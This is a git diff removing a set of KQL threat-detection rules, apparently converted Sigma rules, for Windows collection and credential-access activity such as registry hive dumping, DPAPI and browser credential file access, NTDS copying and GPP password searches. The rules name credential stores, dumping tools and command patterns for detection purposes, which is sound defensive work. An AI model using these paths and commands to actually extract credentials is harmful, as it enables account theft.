-| where ActionType =~ "DeleteValue" and RegistryKey endswith "\\Microsoft\\Windows\\WindowsAI\\DisableAIDataAnalysis"
\ No newline at end of file
diff --git a/Collection/Windows_Recall_Feature_Enabled_-_Registry.kql b/Collection/Windows_Recall_Feature_Enabled_-_Registry.kql
deleted file mode 100644
index 198194ac..00000000
--- a/Collection/Windows_Recall_Feature_Enabled_-_Registry.kql
+++ /dev/null
@@ -1,10 +0,0 @@
-// Author: Sajid Nawaz Khan
-// Date: 2024/06/02
-// Level: medium
-// Description: Detects the enabling of the Windows Recall feature via registry manipulation. Windows Recall can be enabled by setting the value of "DisableAIDataAnalysis" to "0".
-Adversaries may enable Windows Recall as part of post-exploitation discovery and collection activities.
-This rule assumes that Recall is already explicitly disabled on the host, and subsequently enabled by the adversary.
-
-// Tags: attack.collection, attack.t1113
-DeviceRegistryEvents
-| where RegistryValueData =~ "DWORD (0x00000000)" and RegistryKey endswith "\\Software\\Policies\\Microsoft\\Windows\\WindowsAI\\DisableAIDataAnalysis"
\ No newline at end of file
diff --git a/Collection/Windows_Recall_Feature_Enabled_Via_Reg.EXE.kql b/Collection/Windows_Recall_Feature_Enabled_Via_Reg.EXE.kql
deleted file mode 100644
index 455bb30d..00000000
--- a/Collection/Windows_Recall_Feature_Enabled_Via_Reg.EXE.kql
+++ /dev/null
@@ -1,11 +0,0 @@
-// Author: Sajid Nawaz Khan
-// Date: 2024/06/02
-// Level: medium
-// Description: Detects the enabling of the Windows Recall feature via registry manipulation.
-Windows Recall can be enabled by deleting the existing "DisableAIDataAnalysis" value, or setting it to 0.
-Adversaries may enable Windows Recall as part of post-exploitation discovery and collection activities.
-This rule assumes that Recall is already explicitly disabled on the host, and subsequently enabled by the adversary.
-
-// Tags: attack.collection, attack.t1113
-DeviceProcessEvents
-| where (FolderPath endswith "\\reg.exe" or ProcessVersionInfoOriginalFileName =~ "reg.exe") and (ProcessCommandLine contains "Microsoft\\Windows\\WindowsAI" and ProcessCommandLine contains "DisableAIDataAnalysis") and ((ProcessCommandLine contains "add" or ProcessCommandLine contains "0") or ProcessCommandLine contains "delete")
\ No newline at end of file
diff --git a/Collection/Winrar_Compressing_Dump_Files.kql b/Collection/Winrar_Compressing_Dump_Files.kql
deleted file mode 100644
index 6970f434..00000000
--- a/Collection/Winrar_Compressing_Dump_Files.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022/01/04
-// Level: medium
-// Description: Detects execution of WinRAR in order to compress a file with a ".dmp"/".dump" extension, which could be a step in a process of dump file exfiltration.
-// Tags: attack.collection, attack.t1560.001
-DeviceProcessEvents
-| where (ProcessCommandLine contains ".dmp" or ProcessCommandLine contains ".dump" or ProcessCommandLine contains ".hdmp") and ((FolderPath endswith "\\rar.exe" or FolderPath endswith "\\winrar.exe") or ProcessVersionInfoFileDescription =~ "Command line RAR")
\ No newline at end of file
diff --git a/Collection/Winrar_Execution_in_Non-Standard_Folder.kql b/Collection/Winrar_Execution_in_Non-Standard_Folder.kql
deleted file mode 100644
index f6a68209..00000000
--- a/Collection/Winrar_Execution_in_Non-Standard_Folder.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), Tigzy
-// Date: 2021/11/17
-// Level: medium
-// Description: Detects a suspicious winrar execution in a folder which is not the default installation folder
-// Tags: attack.collection, attack.t1560.001
-DeviceProcessEvents
-| where ((FolderPath endswith "\\rar.exe" or FolderPath endswith "\\winrar.exe") or ProcessVersionInfoFileDescription =~ "Command line RAR") and (not(((FolderPath contains ":\\Program Files (x86)\\WinRAR\\" or FolderPath contains ":\\Program Files\\WinRAR\\") or FolderPath endswith "\\UnRAR.exe"))) and (not(FolderPath contains ":\\Windows\\Temp\\"))
\ No newline at end of file
diff --git a/Credential Access/AADInternals_PowerShell_Cmdlets_Execution_-_ProccessCreation.kql b/Credential Access/AADInternals_PowerShell_Cmdlets_Execution_-_ProccessCreation.kql
deleted file mode 100644
index 5a91ee73..00000000
--- a/Credential Access/AADInternals_PowerShell_Cmdlets_Execution_-_ProccessCreation.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Austin Songer (@austinsonger), Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/12/23
-// Level: high
-// Description: Detects ADDInternals Cmdlet execution. A tool for administering Azure AD and Office 365. Which can be abused by threat actors to attack Azure AD or Office 365.
-// Tags: attack.execution, attack.reconnaissance, attack.discovery, attack.credential_access, attack.impact
-DeviceProcessEvents
-| where (ProcessCommandLine contains "Add-AADInt" or ProcessCommandLine contains "ConvertTo-AADInt" or ProcessCommandLine contains "Disable-AADInt" or ProcessCommandLine contains "Enable-AADInt" or ProcessCommandLine contains "Export-AADInt" or ProcessCommandLine contains "Get-AADInt" or ProcessCommandLine contains "Grant-AADInt" or ProcessCommandLine contains "Install-AADInt" or ProcessCommandLine contains "Invoke-AADInt" or ProcessCommandLine contains "Join-AADInt" or ProcessCommandLine contains "New-AADInt" or ProcessCommandLine contains "Open-AADInt" or ProcessCommandLine contains "Read-AADInt" or ProcessCommandLine contains "Register-AADInt" or ProcessCommandLine contains "Remove-AADInt" or ProcessCommandLine contains "Restore-AADInt" or ProcessCommandLine contains "Search-AADInt" or ProcessCommandLine contains "Send-AADInt" or ProcessCommandLine contains "Set-AADInt" or ProcessCommandLine contains "Start-AADInt" or ProcessCommandLine contains "Update-AADInt") and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.Exe", "pwsh.dll")))
\ No newline at end of file
diff --git a/Credential Access/Access_To_Browser_Credential_Files_By_Uncommon_Application.kql b/Credential Access/Access_To_Browser_Credential_Files_By_Uncommon_Application.kql
deleted file mode 100644
index 7291b3f5..00000000
--- a/Credential Access/Access_To_Browser_Credential_Files_By_Uncommon_Application.kql	
+++ /dev/null
@@ -1,10 +0,0 @@
-// Author: frack113
-// Date: 2022/04/09
-// Level: medium
-// Description: Detects file access requests to browser credential stores by uncommon processes.
-Could indicate potential attempt of credential stealing.
-Requires heavy baselining before usage
-
-// Tags: attack.t1003, attack.credential_access
-DeviceFileEvents
-| where ((FileName contains "\\Appdata\\Local\\Chrome\\User Data\\Default\\Login Data" or FileName contains "\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Network\\Cookies" or FileName contains "\\AppData\\Local\\Google\\Chrome\\User Data\\Local State") or (FileName endswith "\\cookies.sqlite" or FileName endswith "release\\key3.db" or FileName endswith "release\\key4.db" or FileName endswith "release\\logins.json") or FileName endswith "\\Appdata\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat") and (not(((InitiatingProcessFolderPath contains ":\\Program Files (x86)\\" or InitiatingProcessFolderPath contains ":\\Program Files\\" or InitiatingProcessFolderPath contains ":\\Windows\\system32\\" or InitiatingProcessFolderPath contains ":\\Windows\\SysWOW64\\") or InitiatingProcessFolderPath =~ "System"))) and (not(((InitiatingProcessFolderPath contains ":\\ProgramData\\Microsoft\\Windows Defender\\" and (InitiatingProcessFolderPath endswith "\\MpCopyAccelerator.exe" or InitiatingProcessFolderPath endswith "\\MsMpEng.exe")) or (InitiatingProcessFolderPath endswith "\\thor64.exe" or InitiatingProcessFolderPath endswith "\\thor.exe"))))
\ No newline at end of file
diff --git a/Credential Access/Access_To_Potentially_Sensitive_Sysvol_Files_By_Uncommon_Application.kql b/Credential Access/Access_To_Potentially_Sensitive_Sysvol_Files_By_Uncommon_Application.kql
deleted file mode 100644
index a9c88609..00000000
--- a/Credential Access/Access_To_Potentially_Sensitive_Sysvol_Files_By_Uncommon_Application.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2023/12/21
-// Level: medium
-// Description: Detects file access requests to potentially sensitive files hosted on the Windows Sysvol share.
-// Tags: attack.credential_access, attack.t1552.006
-DeviceFileEvents
-| where ((FileName contains "\\sysvol\\" and FileName contains "\\Policies\\") and (FileName endswith "audit.csv" or FileName endswith "Files.xml" or FileName endswith "GptTmpl.inf" or FileName endswith "groups.xml" or FileName endswith "Registry.pol" or FileName endswith "Registry.xml" or FileName endswith "scheduledtasks.xml" or FileName endswith "scripts.ini" or FileName endswith "services.xml") and FileName startswith "\\") and (not((InitiatingProcessFolderPath startswith ":\\Program Files (x86)\\" or InitiatingProcessFolderPath startswith ":\\Program Files\\" or InitiatingProcessFolderPath startswith ":\\Windows\\explorer.exe" or InitiatingProcessFolderPath startswith ":\\Windows\\system32\\" or InitiatingProcessFolderPath startswith ":\\Windows\\SysWOW64\\")))
\ No newline at end of file
diff --git a/Credential Access/Access_To_Windows_Credential_History_File_By_Uncommon_Application.kql b/Credential Access/Access_To_Windows_Credential_History_File_By_Uncommon_Application.kql
deleted file mode 100644
index 89cda722..00000000
--- a/Credential Access/Access_To_Windows_Credential_History_File_By_Uncommon_Application.kql	
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/10/17
-// Level: medium
-// Description: Detects file access requests to the Windows Credential History File by an uncommon application.
-This can be a sign of credential stealing. Example case would be usage of mimikatz "dpapi::credhist" function
-
-// Tags: attack.credential_access, attack.t1555.004
-DeviceFileEvents
-| where FileName endswith "\\Microsoft\\Protect\\CREDHIST" and (not((InitiatingProcessFolderPath endswith ":\\Windows\\explorer.exe" or (InitiatingProcessFolderPath contains ":\\Program Files\\" or InitiatingProcessFolderPath contains ":\\Program Files (x86)\\" or InitiatingProcessFolderPath contains ":\\Windows\\system32\\" or InitiatingProcessFolderPath contains ":\\Windows\\SysWOW64\\"))))
\ No newline at end of file
diff --git a/Credential Access/Access_To_Windows_DPAPI_Master_Keys_By_Uncommon_Application.kql b/Credential Access/Access_To_Windows_DPAPI_Master_Keys_By_Uncommon_Application.kql
deleted file mode 100644
index 58097097..00000000
--- a/Credential Access/Access_To_Windows_DPAPI_Master_Keys_By_Uncommon_Application.kql	
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/10/17
-// Level: medium
-// Description: Detects file access requests to the the Windows Data Protection API Master keys by an uncommon application.
-This can be a sign of credential stealing. Example case would be usage of mimikatz "dpapi::masterkey" function
-
-// Tags: attack.credential_access, attack.t1555.004
-DeviceFileEvents
-| where (FileName contains "\\Microsoft\\Protect\\S-1-5-18\\" or FileName contains "\\Microsoft\\Protect\\S-1-5-21-") and (not((InitiatingProcessFolderPath contains ":\\Program Files\\" or InitiatingProcessFolderPath contains ":\\Program Files (x86)\\" or InitiatingProcessFolderPath contains ":\\Windows\\system32\\" or InitiatingProcessFolderPath contains ":\\Windows\\SysWOW64\\")))
\ No newline at end of file
diff --git a/Credential Access/Active_Directory_Database_Snapshot_Via_ADExplorer.kql b/Credential Access/Active_Directory_Database_Snapshot_Via_ADExplorer.kql
deleted file mode 100644
index 35b910af..00000000
--- a/Credential Access/Active_Directory_Database_Snapshot_Via_ADExplorer.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/03/14
-// Level: medium
-// Description: Detects the execution of Sysinternals ADExplorer with the "-snapshot" flag in order to save a local copy of the active directory database.
-// Tags: attack.credential_access, attack.t1552.001, attack.t1003.003
-DeviceProcessEvents
-| where ProcessCommandLine contains "snapshot" and (FolderPath endswith "\\ADExplorer.exe" or ProcessVersionInfoOriginalFileName =~ "AdExp")
\ No newline at end of file
diff --git a/Credential Access/Automated_Collection_Command_Prompt.kql b/Credential Access/Automated_Collection_Command_Prompt.kql
deleted file mode 100644
index 9f680167..00000000
--- a/Credential Access/Automated_Collection_Command_Prompt.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2021/07/28
-// Level: medium
-// Description: Once established within a system or network, an adversary may use automated techniques for collecting internal data.
-// Tags: attack.collection, attack.t1119, attack.credential_access, attack.t1552.001
-DeviceProcessEvents
-| where (ProcessCommandLine contains ".doc" or ProcessCommandLine contains ".docx" or ProcessCommandLine contains ".xls" or ProcessCommandLine contains ".xlsx" or ProcessCommandLine contains ".ppt" or ProcessCommandLine contains ".pptx" or ProcessCommandLine contains ".rtf" or ProcessCommandLine contains ".pdf" or ProcessCommandLine contains ".txt") and ((ProcessCommandLine contains "dir " and ProcessCommandLine contains " /b " and ProcessCommandLine contains " /s ") or ((ProcessCommandLine contains " /e " or ProcessCommandLine contains " /si ") and ProcessVersionInfoOriginalFileName =~ "FINDSTR.EXE"))
\ No newline at end of file
diff --git a/Credential Access/Browser_Started_with_Remote_Debugging.kql b/Credential Access/Browser_Started_with_Remote_Debugging.kql
deleted file mode 100644
index a1e712fd..00000000
--- a/Credential Access/Browser_Started_with_Remote_Debugging.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/07/27
-// Level: medium
-// Description: Detects browsers starting with the remote debugging flags. Which is a technique often used to perform browser injection attacks
-// Tags: attack.credential_access, attack.t1185
-DeviceProcessEvents
-| where ProcessCommandLine contains " --remote-debugging-" or (ProcessCommandLine contains " -start-debugger-server" and FolderPath endswith "\\firefox.exe")
\ No newline at end of file
diff --git a/Credential Access/Capture_Credentials_with_Rpcping.exe.kql b/Credential Access/Capture_Credentials_with_Rpcping.exe.kql
deleted file mode 100644
index a795212c..00000000
--- a/Credential Access/Capture_Credentials_with_Rpcping.exe.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Julia Fomina, oscd.community
-// Date: 2020/10/09
-// Level: medium
-// Description: Detects using Rpcping.exe to send a RPC test connection to the target server (-s) and force the NTLM hash to be sent in the process.
-// Tags: attack.credential_access, attack.t1003
-DeviceProcessEvents
-| where FolderPath endswith "\\rpcping.exe" and (ProcessCommandLine contains "-s" or ProcessCommandLine contains "/s") and (((ProcessCommandLine contains "-u" or ProcessCommandLine contains "/u") and (ProcessCommandLine contains "NTLM")) or ((ProcessCommandLine contains "-t" or ProcessCommandLine contains "/t") and (ProcessCommandLine contains "ncacn_np")))
\ No newline at end of file
diff --git a/Credential Access/Certificate_Exported_Via_PowerShell.kql b/Credential Access/Certificate_Exported_Via_PowerShell.kql
deleted file mode 100644
index 3d1a911f..00000000
--- a/Credential Access/Certificate_Exported_Via_PowerShell.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/05/18
-// Level: medium
-// Description: Detects calls to cmdlets that are used to export certificates from the local certificate store. Threat actors were seen abusing this to steal private keys from compromised machines.
-// Tags: attack.credential_access, attack.execution, attack.t1552.004, attack.t1059.001
-DeviceProcessEvents
-| where ProcessCommandLine contains "Export-PfxCertificate " or ProcessCommandLine contains "Export-Certificate "
\ No newline at end of file
diff --git a/Credential Access/Copying_Sensitive_Files_with_Credential_Data.kql b/Credential Access/Copying_Sensitive_Files_with_Credential_Data.kql
deleted file mode 100644
index 7128b3f4..00000000
--- a/Credential Access/Copying_Sensitive_Files_with_Credential_Data.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community
-// Date: 2019/10/22
-// Level: high
-// Description: Files with well-known filenames (sensitive files with credential data) copying
-// Tags: attack.credential_access, attack.t1003.002, attack.t1003.003, car.2013-07-001, attack.s0404
-DeviceProcessEvents
-| where ((ProcessCommandLine contains "vss" or ProcessCommandLine contains " /m " or ProcessCommandLine contains " /y ") and (FolderPath endswith "\\esentutl.exe" or ProcessVersionInfoOriginalFileName =~ "\\esentutl.exe")) or (ProcessCommandLine contains "\\windows\\ntds\\ntds.dit" or ProcessCommandLine contains "\\config\\sam" or ProcessCommandLine contains "\\config\\security" or ProcessCommandLine contains "\\config\\system " or ProcessCommandLine contains "\\repair\\sam" or ProcessCommandLine contains "\\repair\\system" or ProcessCommandLine contains "\\repair\\security" or ProcessCommandLine contains "\\config\\RegBack\\sam" or ProcessCommandLine contains "\\config\\RegBack\\system" or ProcessCommandLine contains "\\config\\RegBack\\security")
\ No newline at end of file
diff --git a/Credential Access/CrackMapExec_File_Indicators.kql b/Credential Access/CrackMapExec_File_Indicators.kql
deleted file mode 100644
index a26d915b..00000000
--- a/Credential Access/CrackMapExec_File_Indicators.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2024/03/11
-// Level: high
-// Description: Detects file creation events with filename patterns used by CrackMapExec.
-// Tags: attack.credential_access, attack.t1003.001
-DeviceFileEvents
-| where FolderPath startswith "C:\\Windows\\Temp\\" and ((FolderPath matches regex "\\\\[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}\\.txt$" or FolderPath matches regex "\\\\[a-zA-Z]{8}\\.tmp$") or (FolderPath endswith "\\temp.ps1" or FolderPath endswith "\\msol.ps1"))
\ No newline at end of file
diff --git a/Credential Access/CredUI.DLL_Loaded_By_Uncommon_Process.kql b/Credential Access/CredUI.DLL_Loaded_By_Uncommon_Process.kql
deleted file mode 100644
index 0fb4879a..00000000
--- a/Credential Access/CredUI.DLL_Loaded_By_Uncommon_Process.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
-// Date: 2020/10/20
-// Level: medium
-// Description: Detects loading of "credui.dll" and related DLLs by an uncommon process. Attackers might leverage this DLL for potential use of "CredUIPromptForCredentials" or "CredUnPackAuthenticationBufferW".
-// Tags: attack.credential_access, attack.collection, attack.t1056.002
-DeviceImageLoadEvents
-| where ((FolderPath endswith "\\credui.dll" or FolderPath endswith "\\wincredui.dll") or (InitiatingProcessVersionInfoOriginalFileName in~ ("credui.dll", "wincredui.dll"))) and (not(((InitiatingProcessFolderPath in~ ("C:\\Windows\\explorer.exe", "C:\\Windows\\ImmersiveControlPanel\\SystemSettings.exe", "C:\\Windows\\regedit.exe")) or (InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\System32\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\SysWOW64\\")))) and (not(((InitiatingProcessFolderPath contains "\\AppData\\Local\\Microsoft\\OneDrive\\" and InitiatingProcessFolderPath startswith "C:\\Users\\") or InitiatingProcessFolderPath endswith "\\opera_autoupdate.exe" or (InitiatingProcessFolderPath endswith "\\procexp64.exe" or InitiatingProcessFolderPath endswith "\\procexp.exe") or (InitiatingProcessFolderPath contains "\\AppData\\Local\\Microsoft\\Teams\\" and InitiatingProcessFolderPath endswith "\\Teams.exe" and InitiatingProcessFolderPath startswith "C:\\Users\\"))))
\ No newline at end of file
diff --git a/Credential Access/Cred_Dump_Tools_Dropped_Files.kql b/Credential Access/Cred_Dump_Tools_Dropped_Files.kql
deleted file mode 100644
index 7914875e..00000000
--- a/Credential Access/Cred_Dump_Tools_Dropped_Files.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Teymur Kheirkhabarov, oscd.community
-// Date: 2019/11/01
-// Level: high
-// Description: Files with well-known filenames (parts of credential dump software or files produced by them) creation
-// Tags: attack.credential_access, attack.t1003.001, attack.t1003.002, attack.t1003.003, attack.t1003.004, attack.t1003.005
-DeviceFileEvents
-| where (FolderPath contains "\\fgdump-log" or FolderPath contains "\\kirbi" or FolderPath contains "\\pwdump" or FolderPath contains "\\pwhashes" or FolderPath contains "\\wce_ccache" or FolderPath contains "\\wce_krbtkts") or (FolderPath endswith "\\cachedump.exe" or FolderPath endswith "\\cachedump64.exe" or FolderPath endswith "\\DumpExt.dll" or FolderPath endswith "\\DumpSvc.exe" or FolderPath endswith "\\Dumpy.exe" or FolderPath endswith "\\fgexec.exe" or FolderPath endswith "\\lsremora.dll" or FolderPath endswith "\\lsremora64.dll" or FolderPath endswith "\\NTDS.out" or FolderPath endswith "\\procdump64.exe" or FolderPath endswith "\\pstgdump.exe" or FolderPath endswith "\\pwdump.exe" or FolderPath endswith "\\SAM.out" or FolderPath endswith "\\SECURITY.out" or FolderPath endswith "\\servpw.exe" or FolderPath endswith "\\servpw64.exe" or FolderPath endswith "\\SYSTEM.out" or FolderPath endswith "\\test.pwd" or FolderPath endswith "\\wceaux.dll")
\ No newline at end of file
diff --git a/Credential Access/Credential_Manager_Access_By_Uncommon_Application.kql b/Credential Access/Credential_Manager_Access_By_Uncommon_Application.kql
deleted file mode 100644
index 3451a855..00000000
--- a/Credential Access/Credential_Manager_Access_By_Uncommon_Application.kql	
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/10/11
-// Level: medium
-// Description: Detects suspicious processes based on name and location that access the windows credential manager and vault.
-Which can be a sign of credential stealing. Example case would be usage of mimikatz "dpapi::cred" function
-
-// Tags: attack.t1003, attack.credential_access
-DeviceFileEvents
-| where (FileName contains "\\AppData\\Local\\Microsoft\\Credentials\\" or FileName contains "\\AppData\\Roaming\\Microsoft\\Credentials\\" or FileName contains "\\AppData\\Local\\Microsoft\\Vault\\" or FileName contains "\\ProgramData\\Microsoft\\Vault\\") and (not((InitiatingProcessFolderPath contains ":\\Program Files\\" or InitiatingProcessFolderPath contains ":\\Program Files (x86)\\" or InitiatingProcessFolderPath contains ":\\Windows\\system32\\" or InitiatingProcessFolderPath contains ":\\Windows\\SysWOW64\\")))
\ No newline at end of file
diff --git a/Credential Access/Dropping_Of_Password_Filter_DLL.kql b/Credential Access/Dropping_Of_Password_Filter_DLL.kql
deleted file mode 100644
index 2ced395a..00000000
--- a/Credential Access/Dropping_Of_Password_Filter_DLL.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Sreeman
-// Date: 2020/10/29
-// Level: medium
-// Description: Detects dropping of dll files in system32 that may be used to retrieve user credentials from LSASS
-// Tags: attack.credential_access, attack.t1556.002
-DeviceProcessEvents
-| where ProcessCommandLine contains "HKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa" and ProcessCommandLine contains "scecli\\0" and ProcessCommandLine contains "reg add"
\ No newline at end of file
diff --git a/Credential Access/Dumping_Process_via_Sqldumper.exe.kql b/Credential Access/Dumping_Process_via_Sqldumper.exe.kql
deleted file mode 100644
index ec50686d..00000000
--- a/Credential Access/Dumping_Process_via_Sqldumper.exe.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Kirill Kiryanov, oscd.community
-// Date: 2020/10/08
-// Level: medium
-// Description: Detects process dump via legitimate sqldumper.exe binary
-// Tags: attack.credential_access, attack.t1003.001
-DeviceProcessEvents
-| where (ProcessCommandLine contains "0x0110" or ProcessCommandLine contains "0x01100:40") and FolderPath endswith "\\sqldumper.exe"
\ No newline at end of file
diff --git a/Credential Access/Dumping_of_Sensitive_Hives_Via_Reg.EXE.kql b/Credential Access/Dumping_of_Sensitive_Hives_Via_Reg.EXE.kql
deleted file mode 100644
index 473cc6b9..00000000
--- a/Credential Access/Dumping_of_Sensitive_Hives_Via_Reg.EXE.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Teymur Kheirkhabarov, Endgame, JHasenbusch, Daniil Yugoslavskiy, oscd.community, frack113
-// Date: 2019/10/22
-// Level: high
-// Description: Detects the usage of "reg.exe" in order to dump sensitive registry hives. This includes SAM, SYSTEM and SECURITY hives.
-// Tags: attack.credential_access, attack.t1003.002, attack.t1003.004, attack.t1003.005, car.2013-07-001
-DeviceProcessEvents
-| where (ProcessCommandLine contains " save " or ProcessCommandLine contains " export " or ProcessCommandLine contains " ˢave " or ProcessCommandLine contains " eˣport ") and (ProcessCommandLine contains "\\system" or ProcessCommandLine contains "\\sam" or ProcessCommandLine contains "\\security" or ProcessCommandLine contains "\\ˢystem" or ProcessCommandLine contains "\\syˢtem" or ProcessCommandLine contains "\\ˢyˢtem" or ProcessCommandLine contains "\\ˢam" or ProcessCommandLine contains "\\ˢecurity") and (ProcessCommandLine contains "hklm" or ProcessCommandLine contains "hk˪m" or ProcessCommandLine contains "hkey_local_machine" or ProcessCommandLine contains "hkey_˪ocal_machine" or ProcessCommandLine contains "hkey_loca˪_machine" or ProcessCommandLine contains "hkey_˪oca˪_machine") and (FolderPath endswith "\\reg.exe" or ProcessVersionInfoOriginalFileName =~ "reg.exe")
\ No newline at end of file
diff --git a/Credential Access/Enumeration_for_3rd_Party_Creds_From_CLI.kql b/Credential Access/Enumeration_for_3rd_Party_Creds_From_CLI.kql
deleted file mode 100644
index 8512a497..00000000
--- a/Credential Access/Enumeration_for_3rd_Party_Creds_From_CLI.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/06/20
-// Level: medium
-// Description: Detects processes that query known 3rd party registry keys that holds credentials via commandline
-// Tags: attack.credential_access, attack.t1552.002
-DeviceProcessEvents
-| where ProcessCommandLine contains "\\Software\\SimonTatham\\PuTTY\\Sessions" or ProcessCommandLine contains "\\Software\\SimonTatham\\PuTTY\\SshHostKeys\\" or ProcessCommandLine contains "\\Software\\Mobatek\\MobaXterm\\" or ProcessCommandLine contains "\\Software\\WOW6432Node\\Radmin\\v3.0\\Server\\Parameters\\Radmin" or ProcessCommandLine contains "\\Software\\Aerofox\\FoxmailPreview" or ProcessCommandLine contains "\\Software\\Aerofox\\Foxmail\\V3.1" or ProcessCommandLine contains "\\Software\\IncrediMail\\Identities" or ProcessCommandLine contains "\\Software\\Qualcomm\\Eudora\\CommandLine" or ProcessCommandLine contains "\\Software\\RimArts\\B2\\Settings" or ProcessCommandLine contains "\\Software\\OpenVPN-GUI\\configs" or ProcessCommandLine contains "\\Software\\Martin Prikryl\\WinSCP 2\\Sessions" or ProcessCommandLine contains "\\Software\\FTPWare\\COREFTP\\Sites" or ProcessCommandLine contains "\\Software\\DownloadManager\\Passwords" or ProcessCommandLine contains "\\Software\\OpenSSH\\Agent\\Keys" or ProcessCommandLine contains "\\Software\\TightVNC\\Server" or ProcessCommandLine contains "\\Software\\ORL\\WinVNC3\\Password" or ProcessCommandLine contains "\\Software\\RealVNC\\WinVNC4"
\ No newline at end of file
diff --git a/Credential Access/Enumeration_for_Credentials_in_Registry.kql b/Credential Access/Enumeration_for_Credentials_in_Registry.kql
deleted file mode 100644
index 1ba1bafc..00000000
--- a/Credential Access/Enumeration_for_Credentials_in_Registry.kql	
+++ /dev/null
@@ -1,10 +0,0 @@
-// Author: frack113
-// Date: 2021/12/20
-// Level: medium
-// Description: Adversaries may search the Registry on compromised systems for insecurely stored credentials.
-The Windows Registry stores configuration information that can be used by the system or other programs.
-Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services
-
-// Tags: attack.credential_access, attack.t1552.002
-DeviceProcessEvents
-| where ((ProcessCommandLine contains " query " and ProcessCommandLine contains "/t " and ProcessCommandLine contains "REG_SZ" and ProcessCommandLine contains "/s") and FolderPath endswith "\\reg.exe") and ((ProcessCommandLine contains "/f " and ProcessCommandLine contains "HKLM") or (ProcessCommandLine contains "/f " and ProcessCommandLine contains "HKCU") or ProcessCommandLine contains "HKCU\\Software\\SimonTatham\\PuTTY\\Sessions")
\ No newline at end of file
diff --git a/Credential Access/Esentutl_Gather_Credentials.kql b/Credential Access/Esentutl_Gather_Credentials.kql
deleted file mode 100644
index 737a9cd8..00000000
--- a/Credential Access/Esentutl_Gather_Credentials.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: sam0x90
-// Date: 2021/08/06
-// Level: medium
-// Description: Conti recommendation to its affiliates to use esentutl to access NTDS dumped file. Trickbot also uses this utilities to get MSEdge info via its module pwgrab.
-// Tags: attack.credential_access, attack.t1003, attack.t1003.003
-DeviceProcessEvents
-| where ProcessCommandLine contains "esentutl" and ProcessCommandLine contains " /p"
\ No newline at end of file
diff --git a/Credential Access/Esentutl_Volume_Shadow_Copy_Service_Keys.kql b/Credential Access/Esentutl_Volume_Shadow_Copy_Service_Keys.kql
deleted file mode 100644
index 7ff25f25..00000000
--- a/Credential Access/Esentutl_Volume_Shadow_Copy_Service_Keys.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
-// Date: 2020/10/20
-// Level: high
-// Description: Detects the volume shadow copy service initialization and processing via esentutl. Registry keys such as HKLM\\System\\CurrentControlSet\\Services\\VSS\\Diag\\VolSnap\\Volume are captured.
-// Tags: attack.credential_access, attack.t1003.002
-DeviceRegistryEvents
-| where (InitiatingProcessFolderPath endswith "esentutl.exe" and RegistryKey contains "System\\CurrentControlSet\\Services\\VSS") and (not(RegistryKey contains "System\\CurrentControlSet\\Services\\VSS\\Start"))
\ No newline at end of file
diff --git a/Credential Access/Findstr_GPP_Passwords.kql b/Credential Access/Findstr_GPP_Passwords.kql
deleted file mode 100644
index 2edc5195..00000000
--- a/Credential Access/Findstr_GPP_Passwords.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2021/12/27
-// Level: high
-// Description: Look for the encrypted cpassword value within Group Policy Preference files on the Domain Controller. This value can be decrypted with gpp-decrypt.
-// Tags: attack.credential_access, attack.t1552.006
-DeviceProcessEvents
-| where (ProcessCommandLine contains "cpassword" and ProcessCommandLine contains "\\sysvol\\" and ProcessCommandLine contains ".xml") and ((FolderPath endswith "\\find.exe" or FolderPath endswith "\\findstr.exe") or (ProcessVersionInfoOriginalFileName in~ ("FIND.EXE", "FINDSTR.EXE")))
\ No newline at end of file
